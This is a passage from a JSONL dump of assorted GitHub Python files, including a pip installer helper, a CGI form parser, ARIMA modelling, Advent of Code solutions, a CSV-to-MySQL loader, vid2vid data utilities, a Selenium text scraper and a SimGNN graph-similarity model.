pkg_resources.get_distribution(package)\n except:\n cout('Installing dependency [{}]'.format(package))\n if context.vars.config and package + '.source' in context.vars.config.__dict__:\n package_source = context.vars.config.__dict__[package + '.source']\n cout('Installing the package from [{}]'.format(package_source))\n run_attributes = [context.config.pip_path, 'install', '-I', '--verbose', '-e', package_source]\n #run_attributes = [context.config.pip_path, 'install', '-I', '--verbose', package, '--no-index', '--find-links', package_source]\n else:\n run_attributes = [context.config.pip_path, 'install', '-I', '--verbose', package]\n if extra_args:\n run_attributes = run_attributes + extra_args.split(' ')\n shell.brun(' '.join(run_attributes))\n\n","repo_name":"GonzaloAlvarez/ephemeral","sub_path":"ephemeral/bootstrap/pip.py","file_name":"pip.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33911918908","text":"\"\"\"FieldStorage.py\n\nThis module defines a subclass of the standard Python cgi.FieldStorage class\nwith an extra method that will allow a FieldStorage to parse a query string\neven in a POST request.\n\"\"\"\n\nimport cgi\nimport os\nimport urllib\n\n\nclass FieldStorage(cgi.FieldStorage):\n \"\"\"Modified FieldStorage class for POST requests with query strings.\n\n Parameters in the query string which have not been sent via POST are\n appended to the field list. This is different from the behavior of\n Python versions before 2.6 which completely ignored the query string in\n POST request, but it's also different from the behavior of the later Python\n versions which append values from the query string to values sent via POST\n for parameters with the same name. With other words, our FieldStorage class\n overrides the query string parameters with the parameters sent via POST.\n\n As recommended by W3C in section B.2.2 of the HTML 4.01 specification,\n we also support use of ';' in place of '&' as separator in query strings.\n \"\"\"\n\n def __init__(self, fp=None, headers=None, outerboundary='',\n environ=os.environ, keep_blank_values=False, strict_parsing=False):\n method = environ.get('REQUEST_METHOD', 'GET').upper()\n qs_on_post = (environ.get('QUERY_STRING', None)\n if method not in ('GET', 'HEAD') else None)\n if qs_on_post:\n environ['QUERY_STRING'] = ''\n try:\n cgi.FieldStorage.__init__(self, fp, headers, outerboundary,\n environ, keep_blank_values, strict_parsing)\n finally:\n if qs_on_post:\n environ['QUERY_STRING'] = qs_on_post\n if qs_on_post:\n self.add_qs(qs_on_post)\n\n def add_qs(self, qs):\n \"\"\"Add all non-existing parameters from the given query string.\"\"\"\n r = {}\n for name_value in qs.split('&'):\n for name_value in name_value.split(';'):\n nv = name_value.split('=', 2)\n if len(nv) != 2:\n if self.strict_parsing:\n raise ValueError('bad query field: %r' % (name_value,))\n continue\n name = urllib.unquote(nv[0].replace('+', ' '))\n value = urllib.unquote(nv[1].replace('+', ' '))\n if len(value) or self.keep_blank_values:\n if name in r:\n r[name].append(value)\n else:\n r[name] = [value]\n if self.list is None:\n # This makes sure self.keys() are available, even\n # when valid POST data wasn't encountered.\n self.list = []\n for key in r:\n if key not in self:\n # Only append values that aren't already the FieldStorage;\n # this makes POSTed vars override vars on the query string.\n for value in r[key]:\n self.list.append(cgi.MiniFieldStorage(key, value))\n","repo_name":"feitianyiren/w4py","sub_path":"WebUtils/FieldStorage.py","file_name":"FieldStorage.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"40257682770","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\nWRITOR: WANG BAO RUI\r\nThis is a temporary script file.\r\n\"\"\"\r\n\r\nfrom __future__ import absolute_import, division, print_function\r\n\r\nimport sys\r\nimport os\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n# TSA from Statsmodels\r\nimport statsmodels.api as sm\r\nimport statsmodels.formula.api as smf\r\nimport statsmodels.tsa.api as smt\r\n\r\n# Display and Plotting\r\nimport matplotlib.pylab as plt\r\nimport seaborn as sns\r\n\r\npd.set_option('display.float_format', lambda x: '%.5f' % x) # pandas\r\nnp.set_printoptions(precision=5, suppress=True) # numpy\r\n\r\npd.set_option('display.max_columns', 100)\r\npd.set_option('display.max_rows', 100)\r\nsns.set(style='ticks', context='poster')\r\n \r\n\r\nos.chdir(\"D://机器学习课程//代码//Python时间序列/\")\r\nfilename_ts = 'train_1.csv'\r\nts_df = pd.read_csv(filename_ts,index_col=0,parse_dates=[0])\r\nn_sample = ts_df.shape[0]\r\n\r\n##spilit the data\r\nn_train=int(0.95*n_sample)+1\r\nn_forecast = n_sample - n_train\r\nts_train = ts_df.iloc[0:n_train]['value']\r\nts_test = ts_df.iloc[n_train:]['value']\r\n\r\ndef tsplot(y, lags=None, title='', figsize=(14, 8)):\r\n \r\n fig = plt.figure(figsize=figsize)\r\n layout = (2, 2)\r\n ts_ax = plt.subplot2grid(layout, (0, 0))\r\n hist_ax = plt.subplot2grid(layout, (0, 1))\r\n acf_ax = plt.subplot2grid(layout, (1, 0))\r\n pacf_ax = plt.subplot2grid(layout, (1, 1))\r\n \r\n y.plot(ax=ts_ax)\r\n ts_ax.set_title(title)\r\n y.plot(ax=hist_ax, kind='hist', bins=25)\r\n hist_ax.set_title('Histogram')\r\n smt.graphics.plot_acf(y, lags=lags, ax=acf_ax)\r\n smt.graphics.plot_pacf(y, lags=lags, ax=pacf_ax)\r\n [ax.set_xlim(0) for ax in [acf_ax, pacf_ax]]\r\n sns.despine()\r\n fig.tight_layout()\r\n return ts_ax, acf_ax, pacf_ax\r\n \r\n \r\n \r\n#Model Estimation\r\n\r\n# Fit the model\r\narima200 = sm.tsa.SARIMAX(ts_train, order=(2,0,0))\r\nmodel_results = arima200.fit()\r\n\r\n#model estimation\r\n\r\nimport itertools\r\n\r\np_min = 0\r\nd_min = 0\r\nq_min = 0\r\np_max = 4\r\nd_max = 0\r\nq_max = 4\r\n\r\n# Initialize a DataFrame to store the results\r\nresults_bic = pd.DataFrame(index=['AR{}'.format(i) for i in range(p_min,p_max+1)],\r\n columns=['MA{}'.format(i) for i in range(q_min,q_max+1)])\r\n\r\nfor p,d,q in itertools.product(range(p_min,p_max+1),\r\n range(d_min,d_max+1),\r\n range(q_min,q_max+1)):\r\n if p==0 and d==0 and q==0:\r\n results_bic.loc['AR{}'.format(p), 'MA{}'.format(q)] = np.nan\r\n continue\r\n \r\n try:\r\n model = sm.tsa.SARIMAX(ts_train, order=(p, d, q),\r\n #enforce_stationarity=False,\r\n #enforce_invertibility=False,\r\n )\r\n results = model.fit()\r\n results_bic.loc['AR{}'.format(p), 'MA{}'.format(q)] = results.bic\r\n except:\r\n continue\r\nresults_bic = results_bic[results_bic.columns].astype(float)\r\n\r\nfig, ax = plt.subplots(figsize=(10, 8))\r\nax = sns.heatmap(results_bic,\r\n mask=results_bic.isnull(),\r\n ax=ax,\r\n annot=True,\r\n fmt='.2f',\r\n );\r\nax.set_title('BIC');\r\n\r\n \r\n\r\ntrain_results = sm.tsa.arma_order_select_ic(ts_train, ic=['aic', 'bic'], trend='nc', max_ar=4, max_ma=4)\r\n\r\nprint('AIC', train_results.aic_min_order)\r\nprint('BIC', train_results.bic_min_order)\r\n\r\n\r\n##Check the model's distribution\r\nmodel_results.plot_diagnostics(figsize=(16, 12));\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"wangshenfeng/ML","sub_path":"ARISM/ARISM model.py","file_name":"ARISM model.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40985351989","text":"\nimport math\n\ndef calc_slope_between(first_asteroid, second_asteroid):\n delta_x = second_asteroid[0] - first_asteroid[0]\n delta_y = second_asteroid[1] - first_asteroid[1]\n\n if delta_x == 0:\n slope_x = 0\n slope_y = delta_y // abs(delta_y)\n elif delta_y == 0:\n slope_x = delta_x // abs(delta_x)\n slope_y = 0\n else:\n gcd_val = gcd(abs(delta_x), abs(delta_y))\n slope_x = delta_x // gcd_val\n slope_y = delta_y // gcd_val\n \n return (slope_x, slope_y)\n\ndef count_asteroids_between(asteroid_list, first_asteroid, second_asteroid):\n slope_x, slope_y = calc_slope_between(first_asteroid, second_asteroid)\n \n step_asteroid = (first_asteroid[0] + slope_x, first_asteroid[1] + slope_y)\n asteroid_count = 0\n \n while step_asteroid != second_asteroid:\n if tuple(step_asteroid) in asteroid_list:\n asteroid_count += 1\n\n step_asteroid = (step_asteroid[0] + slope_x, step_asteroid[1] + slope_y)\n \n return asteroid_count\n\ndef asteroid_visible(asteroid_list, first_asteroid, second_asteroid):\n return count_asteroids_between(asteroid_list, first_asteroid, second_asteroid) == 0\n\ndef calc_angle_between(asteroid_list, first_asteroid, second_asteroid):\n\n slope_x, slope_y = calc_slope_between(first_asteroid, second_asteroid)\n\n asteroids_between = count_asteroids_between(asteroid_list, first_asteroid, second_asteroid)\n\n hypoteneuse = math.sqrt(float(slope_x ** 2 + slope_y ** 2))\n divisor = abs(float(slope_x)) / hypoteneuse\n\n # Note: straight up is the zero angle. For this scenario, slope_y will be negative.\n # This means that the slope_y comparisons will be the opposite of expected.\n if slope_x == 0:\n if slope_y < 0:\n final_angle = 0\n else:\n final_angle = math.pi\n elif slope_y == 0:\n if slope_x < 0:\n final_angle = math.pi * 3 / 2\n else:\n final_angle = math.pi / 2\n elif slope_x > 0 and slope_y < 0:\n final_angle = math.asin(divisor)\n elif slope_x > 0 and slope_y > 0:\n final_angle = math.acos(divisor) + math.pi / 2\n elif slope_x < 0 and slope_y > 0:\n final_angle = math.asin(divisor) + math.pi\n elif slope_x < 0 and slope_y < 0:\n final_angle = math.acos(divisor) + math.pi * 3 / 2\n\n final_angle += asteroids_between * 2 * math.pi\n\n return final_angle\n\ndef gcd(a, b):\n\n if b > a:\n return gcd(b, a)\n if b == 0:\n return a\n \n return gcd(b, a % b)\n\n\ninput_file = 'adventofcode2019/10_MonitorStation.txt'\n\nif __name__ == \"__main__\":\n\n file_obj = open(input_file, 'r')\n\n asteroid_list = {}\n\n for line_no, line in enumerate(file_obj.readlines()):\n line = line.strip()\n\n for i, x in enumerate(line):\n if x == \"#\":\n asteroid_list[(i, line_no)] = 0\n \n iter_asteroids = list(asteroid_list.keys())\n\n for ind, fir_ast in enumerate(iter_asteroids[0:-1]):\n for sec_ast in iter_asteroids[ind+1:]:\n\n if asteroid_visible(asteroid_list, fir_ast, sec_ast):\n asteroid_list[fir_ast] += 1\n asteroid_list[sec_ast] += 1\n \n max_ast = max(asteroid_list, key=lambda x: asteroid_list[x])\n\n print(\"Part 1 Result:\")\n print(max_ast)\n print(asteroid_list[max_ast])\n\n print(\"Part 2 Result\")\n \n angle_dict = {}\n\n for ast in iter_asteroids:\n if ast != max_ast:\n rotate_angle = calc_angle_between(asteroid_list, max_ast, ast)\n else:\n rotate_angle = -1\n\n angle_dict[ast] = rotate_angle\n\n angle_sorted = list(sorted(iter_asteroids, key=lambda x: angle_dict[x]))\n\n target_asteroid = angle_sorted[200]\n\n #print(target_asteroid)\n #print(angle_dict[target_asteroid])\n\n for i, x in enumerate(angle_sorted[1:]):\n print(i+1, x)\n","repo_name":"idoerr/challenges","sub_path":"adventofcode2019/10_MonitorStation.py","file_name":"10_MonitorStation.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12763351420","text":"'''\n@Author: Senkita\n'''\n\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom datetime import datetime\nfrom sqlalchemy.types import NVARCHAR, Float, Integer\nimport pymysql\nimport sqlalchemy\nimport os\n\ndef resave(file_dir,year,month):\n titles = ['tripduration',\n 'starttime',\n 'stoptime',\n 'start station id',\n 'start station name',\n 'start station latitude',\n 'start station longitude',\n 'end station id',\n 'end station name',\n 'end station latitude',\n 'end station longitude',\n 'bikeid',\n 'usertype',\n 'birth year',\n 'gender']\n old_file = pd.read_csv(os.path.join(file_dir,'{:0>4d}-{:0>2d}.csv'.format(year,month)),\n encoding='gbk',\n names=titles,\n parse_dates=['starttime','stoptime','birth year'],\n low_memory=False)\n if os.path.exists(os.path.join(file_dir,'{:0>4d}{:0>2d}.csv'.format(year,month))):\n os.remove(os.path.join(file_dir,'{:0>4d}{:0>2d}.csv'.format(year,month)))\n old_file[1:].to_csv(os.path.join(file_dir,'{:0>4d}{:0>2d}.csv'.format(year,month)))\n os.remove(os.path.join(file_dir,'{:0>4d}-{:0>2d}.csv'.format(year,month)))\n new_file = pd.read_csv(os.path.join(file_dir,'{:0>4d}{:0>2d}.csv'.format(year,month)),\n encoding='gbk',\n parse_dates=['starttime','stoptime','birth year'],\n low_memory=False)\n new_file.drop(columns='Unnamed: 0',inplace=True)\n return new_file\ndef map_types(df):\n dtypedict = {}\n for i,j in zip(df.columns,df.dtypes):\n if 'object' in str(j):\n dtypedict.update({i:NVARCHAR(length=255)})\n if 'float' in str(j):\n dtypedict.update({i:Float(precision=2,asdecimal=True)})\n if 'int' in str(j):\n dtypedict.update({i:Integer})\n return dtypedict\ndef create_connection():\n config = dict(host='主机名',\n user='用户名',\n passwd='密码',\n cursorclass=pymysql.cursors.DictCursor)\n conn = pymysql.Connect(**config)\n conn.autocommit(1)\n cursor = conn.cursor()\n cursor.execute('create database if not exists data')\n cursor.close()\n conn.close()\n engine = create_engine('mysql+pymysql://用户名:密码@主机名:3306/data')\n return engine.connect()\ndef main(year,month):\n file_dir = os.path.join(os.getcwd(),'data/')\n df = resave(file_dir,year,month)\n conn = create_connection()\n dtypedict = map_types(df)\n df.to_sql(name='{:0>4d}{:0>2d}'.format(year,month),\n con=conn,\n if_exists='replace',\n index=False,\n dtype=dtypedict)\n os.remove(os.path.join(file_dir,'{:0>4d}{:0>2d}.csv'.format(year,month)))\nif __name__ == '__main__':\n for year in range(2013,2020):\n if year == 2013:\n for month in range(6,13):\n main(year,month)\n elif year == 2019:\n for month in range(2):\n main(year,month)\n else:\n for month in range(1,13):\n main(year,month)","repo_name":"DeerChen/PracticeProject","sub_path":"CitiBike/DataCollection/SaveCitiBikeData.py","file_name":"SaveCitiBikeData.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"653886086","text":"from util.util import add_dummy_to_tensor\nimport torch.utils.data as data\nimport torch\nfrom PIL import Image\nimport torchvision.transforms as transforms\nimport numpy as np\nimport random\n\nclass BaseDataset(data.Dataset):\n def __init__(self):\n super(BaseDataset, self).__init__()\n\n def name(self):\n return 'BaseDataset'\n\n def initialize(self, opt):\n pass\n\n def update_training_batch(self, ratio): # update the training sequence length to be longer \n seq_len_max = min(128, self.seq_len_max) - (self.opt.n_frames_G - 1)\n if self.n_frames_total < seq_len_max:\n self.n_frames_total = min(seq_len_max, self.opt.n_frames_total * (2**ratio))\n #self.n_frames_total = min(seq_len_max, self.opt.n_frames_total * (ratio + 1))\n print('--------- Updating training sequence length to %d ---------' % self.n_frames_total)\n\n def init_frame_idx(self, A_paths):\n self.n_of_seqs = min(len(A_paths), self.opt.max_dataset_size) # number of sequences to train\n self.seq_len_max = max([len(A) for A in A_paths]) # max number of frames in the training sequences\n\n self.seq_idx = 0 # index for current sequence\n self.frame_idx = self.opt.start_frame if not self.opt.isTrain else 0 # index for current frame in the sequence\n self.frames_count = [] # number of frames in each sequence\n for path in A_paths:\n self.frames_count.append(len(path) - self.opt.n_frames_G + 1)\n\n self.folder_prob = [count / sum(self.frames_count) for count in self.frames_count]\n self.n_frames_total = self.opt.n_frames_total if self.opt.isTrain else 1 \n self.A, self.B, self.I = None, None, None\n\n def update_frame_idx(self, A_paths, index):\n if self.opt.isTrain:\n if self.opt.dataset_mode == 'pose': \n seq_idx = np.random.choice(len(A_paths), p=self.folder_prob) # randomly pick sequence to train\n self.frame_idx = index\n else: \n seq_idx = index % self.n_of_seqs \n return None, None, None, seq_idx\n else:\n self.change_seq = self.frame_idx >= self.frames_count[self.seq_idx]\n if self.change_seq:\n self.seq_idx += 1\n self.frame_idx = 0\n self.A, self.B, self.I = None, None, None\n return self.A, self.B, self.I, self.seq_idx\n\n def init_data_params(self, data, n_gpus, tG):\n opt = self.opt\n _, n_frames_total, self.height, self.width = data['B'].size() # n_frames_total = n_frames_load * n_loadings + tG - 1 \n n_frames_total = n_frames_total // opt.output_nc\n n_frames_load = opt.max_frames_per_gpu * n_gpus # number of total frames loaded into GPU at a time for each batch\n n_frames_load = min(n_frames_load, n_frames_total - tG + 1)\n self.t_len = n_frames_load + tG - 1 # number of loaded frames plus previous frames\n return n_frames_total-self.t_len+1, n_frames_load, self.t_len\n\n def init_data(self, t_scales):\n fake_B_last = None # the last generated frame from previous training batch (which becomes input to the next batch)\n real_B_all, fake_B_all, flow_ref_all, conf_ref_all = None, None, None, None # all real/generated frames so far\n if self.opt.sparse_D:\n real_B_all, fake_B_all, flow_ref_all, conf_ref_all = [None]*t_scales, [None]*t_scales, [None]*t_scales, [None]*t_scales\n \n frames_all = real_B_all, fake_B_all, flow_ref_all, conf_ref_all \n return fake_B_last, frames_all\n\n def prepare_data(self, data, i, input_nc, output_nc):\n t_len, height, width = self.t_len, self.height, self.width\n # 5D tensor: batchSize, # of frames, # of channels, height, width\n input_A = (data['A'][:, i*input_nc:(i+t_len)*input_nc, ...]).view(-1, t_len, input_nc, height, width)\n input_B = (data['B'][:, i*output_nc:(i+t_len)*output_nc, ...]).view(-1, t_len, output_nc, height, width) \n inst_A = (data['inst'][:, i:i+t_len, ...]).view(-1, t_len, 1, height, width) if len(data['inst'].size()) > 2 else None\n return [input_A, input_B, inst_A]\n\ndef make_power_2(n, base=32.0): \n return int(round(n / base) * base)\n\ndef get_img_params(opt, size):\n w, h = size\n new_h, new_w = h, w \n if 'resize' in opt.resize_or_crop: # resize image to be loadSize x loadSize\n new_h = new_w = opt.loadSize \n elif 'scaleWidth' in opt.resize_or_crop: # scale image width to be loadSize\n new_w = opt.loadSize\n new_h = opt.loadSize * h // w\n elif 'scaleHeight' in opt.resize_or_crop: # scale image height to be loadSize\n new_h = opt.loadSize\n new_w = opt.loadSize * w // h\n elif 'randomScaleWidth' in opt.resize_or_crop: # randomly scale image width to be somewhere between loadSize and fineSize\n new_w = random.randint(opt.fineSize, opt.loadSize + 1)\n new_h = new_w * h // w\n elif 'randomScaleHeight' in opt.resize_or_crop: # randomly scale image height to be somewhere between loadSize and fineSize\n new_h = random.randint(opt.fineSize, opt.loadSize + 1)\n new_w = new_h * w // h\n new_w = int(round(new_w / 4)) * 4\n new_h = int(round(new_h / 4)) * 4 \n\n crop_x = crop_y = 0\n crop_w = crop_h = 0\n if 'crop' in opt.resize_or_crop or 'scaledCrop' in opt.resize_or_crop:\n if 'crop' in opt.resize_or_crop: # crop patches of size fineSize x fineSize\n crop_w = crop_h = opt.fineSize\n else:\n if 'Width' in opt.resize_or_crop: # crop patches of width fineSize\n crop_w = opt.fineSize\n crop_h = opt.fineSize * h // w\n else: # crop patches of height fineSize\n crop_h = opt.fineSize\n crop_w = opt.fineSize * w // h\n\n crop_w, crop_h = make_power_2(crop_w), make_power_2(crop_h) \n x_span = (new_w - crop_w) // 2\n crop_x = np.maximum(0, np.minimum(x_span*2, int(np.random.randn() * x_span/3 + x_span))) \n crop_y = random.randint(0, np.minimum(np.maximum(0, new_h - crop_h), new_h // 8))\n #crop_x = random.randint(0, np.maximum(0, new_w - crop_w))\n #crop_y = random.randint(0, np.maximum(0, new_h - crop_h)) \n else:\n new_w, new_h = make_power_2(new_w), make_power_2(new_h)\n\n flip = (random.random() > 0.5) and (opt.dataset_mode != 'pose')\n return {'new_size': (new_w, new_h), 'crop_size': (crop_w, crop_h), 'crop_pos': (crop_x, crop_y), 'flip': flip}\n\ndef get_transform(opt, params, method=Image.BICUBIC, normalize=True, toTensor=True):\n transform_list = []\n ### resize input image\n if 'resize' in opt.resize_or_crop:\n osize = [opt.loadSize, opt.loadSize]\n transform_list.append(transforms.Scale(osize, method)) \n else:\n transform_list.append(transforms.Lambda(lambda img: __scale_image(img, params['new_size'], method)))\n \n ### crop patches from image\n if 'crop' in opt.resize_or_crop or 'scaledCrop' in opt.resize_or_crop:\n transform_list.append(transforms.Lambda(lambda img: __crop(img, params['crop_size'], params['crop_pos']))) \n\n ### random flip\n if opt.isTrain and not opt.no_flip:\n transform_list.append(transforms.Lambda(lambda img: __flip(img, params['flip'])))\n\n if toTensor:\n transform_list += [transforms.ToTensor()]\n if normalize:\n transform_list += [transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5))]\n return transforms.Compose(transform_list)\n\ndef toTensor_normalize(): \n transform_list = [transforms.ToTensor()] \n transform_list += [transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5))]\n return transforms.Compose(transform_list)\n\ndef __scale_image(img, size, method=Image.BICUBIC):\n w, h = size \n return img.resize((w, h), method)\n\ndef __crop(img, size, pos):\n ow, oh = img.size\n tw, th = size\n x1, y1 = pos \n if (ow > tw or oh > th): \n return img.crop((x1, y1, min(ow, x1 + tw), min(oh, y1 + th)))\n return img\n\ndef __flip(img, flip):\n if flip:\n return img.transpose(Image.FLIP_LEFT_RIGHT)\n return img\n\ndef get_video_params(opt, n_frames_total, cur_seq_len, index):\n tG = opt.n_frames_G\n if opt.isTrain: \n n_frames_total = min(n_frames_total, cur_seq_len - tG + 1)\n\n n_gpus = opt.n_gpus_gen if opt.batchSize == 1 else 1 # number of generator GPUs for each batch\n n_frames_per_load = opt.max_frames_per_gpu * n_gpus # number of frames to load into GPUs at one time (for each batch)\n n_frames_per_load = min(n_frames_total, n_frames_per_load)\n n_loadings = n_frames_total // n_frames_per_load # how many times are needed to load entire sequence into GPUs \n n_frames_total = n_frames_per_load * n_loadings + tG - 1 # rounded overall number of frames to read from the sequence\n \n max_t_step = min(opt.max_t_step, (cur_seq_len-1) // (n_frames_total-1))\n t_step = np.random.randint(max_t_step) + 1 # spacing between neighboring sampled frames\n offset_max = max(1, cur_seq_len - (n_frames_total-1)*t_step) # maximum possible index for the first frame \n if opt.dataset_mode == 'pose':\n start_idx = index % offset_max\n else:\n start_idx = np.random.randint(offset_max) # offset for the first frame to load\n if opt.debug:\n print(\"loading %d frames in total, first frame starting at index %d, space between neighboring frames is %d\"\n % (n_frames_total, start_idx, t_step))\n else:\n n_frames_total = tG\n start_idx = index\n t_step = 1 \n return n_frames_total, start_idx, t_step\n\ndef concat_frame(A, Ai, nF):\n if A is None:\n A = Ai\n else:\n c = Ai.size()[0]\n if A.size()[0] == nF * c:\n A = A[c:]\n A = torch.cat([A, Ai])\n return A","repo_name":"NVIDIA/vid2vid","sub_path":"data/base_dataset.py","file_name":"base_dataset.py","file_ext":"py","file_size_in_byte":10368,"program_lang":"python","lang":"en","doc_type":"code","stars":8394,"dataset":"github-code","pt":"37"} +{"seq_id":"22723880726","text":"from selenium import webdriver\n#实例化一个浏览器驱动\nchrome = webdriver.Chrome()\n#访问页面\nchrome.get(\"http://book.zongheng.com/chapter/837093/55277727.html\")\n#捕获元素\ntexts =chrome.find_elements_by_xpath(\"//div[@class='content']/p\")\n#将内容写到txt文件当中\nfor t in texts:\n with open(\"xiaoshuo.txt\",\"a\") as f:\n f.write(t.text)\n#关闭浏览器\nchrome.close()\n\n","repo_name":"GuoKangPython/zidonghua","sub_path":"Xpath.py","file_name":"Xpath.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72780701226","text":"import torch\nimport torch_geometric.nn as pyg_nn\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import pad_sequence \nfrom torch_geometric.data import Data, Batch\nfrom torch_geometric.utils import to_dense_batch\n\nimport pytorch_lightning as pl\nimport torchmetrics\n\nfrom gnn_convs import build_conv_model\n\nclass SimGNN(pl.LightningModule):\n def __init__(self,gnn_layers, input_dim, hidden_dim, tensor_neurons, bottle_neck_neurons, histogram = False, bins = 10, dropout=0.5, conv_type = \"GIN\", \\\n lr = 0.001):\n \"\"\"\n \"\"\"\n super(SimGNN, self).__init__()\n\n self.input_dim = input_dim\n self.tensor_neurons = tensor_neurons\n self.dropout = dropout\n self.gnn_layers = gnn_layers\n self.bottle_neck_neurons = bottle_neck_neurons\n self.histogram = histogram\n self.bins = bins\n self.conv_type = conv_type\n self.lr = lr\n\n self.mse_loss = torchmetrics.MeanSquaredError()\n self.train_acc = torchmetrics.Accuracy(num_classes=2)\n self.val_acc = torchmetrics.Accuracy(num_classes=2)\n\n #Conv layers\n if not isinstance(hidden_dim, list):\n hidden_dim = [hidden_dim]*gnn_layers\n self.hidden_dim = hidden_dim\n assert(gnn_layers == len(hidden_dim))\n\n conv_model = build_conv_model(self.conv_type, 1)\n self.convs = torch.nn.ModuleList()\n for dim in hidden_dim:\n self.convs.append(conv_model(input_dim, dim))\n input_dim = dim\n \n #Attention\n self.attention_layer = torch.nn.Linear(self.hidden_dim[-1], self.hidden_dim[-1], bias=False)\n torch.nn.init.xavier_uniform_(self.attention_layer.weight)\n #NTN\n self.ntn_a = torch.nn.Bilinear(self.hidden_dim[-1], self.hidden_dim[-1], tensor_neurons, bias=False)\n torch.nn.init.xavier_uniform_(self.ntn_a.weight)\n self.ntn_b = torch.nn.Linear(2*self.hidden_dim[-1], tensor_neurons, bias=False)\n torch.nn.init.xavier_uniform_(self.ntn_b.weight)\n self.ntn_bias = torch.nn.Parameter(torch.Tensor(tensor_neurons,1))\n torch.nn.init.xavier_uniform_(self.ntn_bias)\n #Final FC\n feature_count = (tensor_neurons+self.bins) if self.histogram else self.tensor_neurons\n self.fc1 = torch.nn.Linear(feature_count, self.bottle_neck_neurons)\n self.fc2 = torch.nn.Linear(self.bottle_neck_neurons, 1)\n\n def GNN (self, data):\n \"\"\"\n \"\"\"\n x, edge_index = data.x, data.edge_index\n for i in range(self.gnn_layers-1):\n x = F.relu(self.convs[i](x, edge_index))\n x = F.dropout(x, p=self.dropout)\n x = self.convs[-1](x, edge_index)\n\n return x\n\n def forward(self, data_pair):\n \"\"\"\n batch_adj is unused\n \"\"\"\n c_graphs = data_pair.target_data()\n q_graphs = data_pair.subgraph_data()\n #q_graphs,c_graphs = zip(*batch_data)\n #a,b = zip(*batch_data_sizes)\n #qgraph_sizes = cudavar(self.av,torch.tensor(a))\n #cgraph_sizes = cudavar(self.av,torch.tensor(b))\n #query_batch = Batch.from_data_list(q_graphs)\n q_graphs_x = self.GNN(q_graphs)\n q, _ = to_dense_batch(q_graphs_x, q_graphs.batch)\n #query_gnode_embeds = [g.x for g in q_graphs.to_data_list()]\n #query_gnode_embeds = []\n #for i in torch.unique(q_graphs.batch):\n # query_gnode_embeds.append(q_graphs.x[q_graphs.batch == i])\n #qgraph_sizes = torch.tensor([g.size(0) for g in query_gnode_embeds])\n #q = pad_sequence(query_gnode_embeds,batch_first=True)\n c_graphs_x = self.GNN(c_graphs)\n \n c, _ = to_dense_batch(c_graphs_x, c_graphs.batch)\n #print(\"c: \", c)\n #corpus_gnode_embeds = [g.x for g in c_graphs.to_data_list()]\n #context = torch.tanh(torch.div(torch.sum(self.attention_layer(q),dim=1).T,qgraph_sizes).T)\n context = torch.tanh(pyg_nn.global_mean_pool(self.attention_layer(q_graphs_x), q_graphs.batch))\n #print(\"context: \", context)\n sigmoid_scores = torch.sigmoid(q @ context.unsqueeze(2))\n e1 = (q.permute(0,2,1)@sigmoid_scores).squeeze()\n #print(\"e1: \", e1)\n #c = pad_sequence(corpus_gnode_embeds,batch_first=True)\n context = torch.tanh(pyg_nn.global_mean_pool(self.attention_layer(c_graphs_x), c_graphs.batch))\n sigmoid_scores = torch.sigmoid(c @ context.unsqueeze(2))\n e2 = (c.permute(0,2,1)@sigmoid_scores).squeeze()\n \n scores = torch.nn.functional.relu(self.ntn_a(e1,e2) +self.ntn_b(torch.cat((e1,e2),dim=-1))+self.ntn_bias.squeeze())\n #print(\"SCORES: \", scores)\n #TODO: Figure out how to tensorize this\n if self.histogram == True:\n h = torch.histc(q@c.permute(0,2,1),bins=self.bins)\n h = h/torch.sum(h)\n\n scores = torch.cat((scores, h),dim=1)\n \n preds = []\n scores = torch.nn.functional.relu(self.fc1(scores))\n score = torch.sigmoid(self.fc2(scores))\n #preds.append(score)\n #p = torch.stack(preds).squeeze()\n return score#p\n\n def training_step(self, batch, batch_idx):\n\n out = self(batch)\n \n loss = F.mse_loss(out.squeeze(), batch.y.float())\n\n pred = (out>0.5).squeeze(1)\n\n self.log(\"train_loss\", loss)\n self.log(\"train acc\", self.train_acc(pred, batch.y))\n return loss\n \n def training_epoch_end(self, out):\n self.log(\"total train acc\", self.train_acc.compute(), prog_bar=True)\n self.train_acc.reset()\n\n def validation_step(self, batch, batch_idx):\n out = self(batch)\n pred = (out>0.5)\n self.log(\"val acc\", self.val_acc(pred.squeeze(), batch.y))\n \n def validation_epoch_end(self, out):\n self.log(\"total val acc\", self.val_acc.compute(), prog_bar=True)\n self.val_acc.reset()\n\n def configure_optimizers(self):\n opt = torch.optim.Adam(self.parameters(), lr=self.lr)\n return opt","repo_name":"XuanzhouLiu/End2End-Subgraph-Matching","sub_path":"graphsim.py","file_name":"graphsim.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22913089950","text":"import sys\nimport notiflib\nwith open('inputday1.txt','r') as input:\n x = input.readlines()\n print(x)\nfinishnum = 0\ny = 0\nmylist = []\ndone = False\nwhile done == False:\n y=0\n for y in range(0,len(x)):\n z=str(x[y])[:len(x[y])-1]\n if z[0] == '-':\n \n z=int(z[0:])\n finishnum = finishnum + z\n \n else:\n print(z)\n z = int(z[0:])\n \n finishnum = finishnum + z\n if finishnum in mylist:\n print(finishnum)\n sys.exit()\n quit()\n else:\n 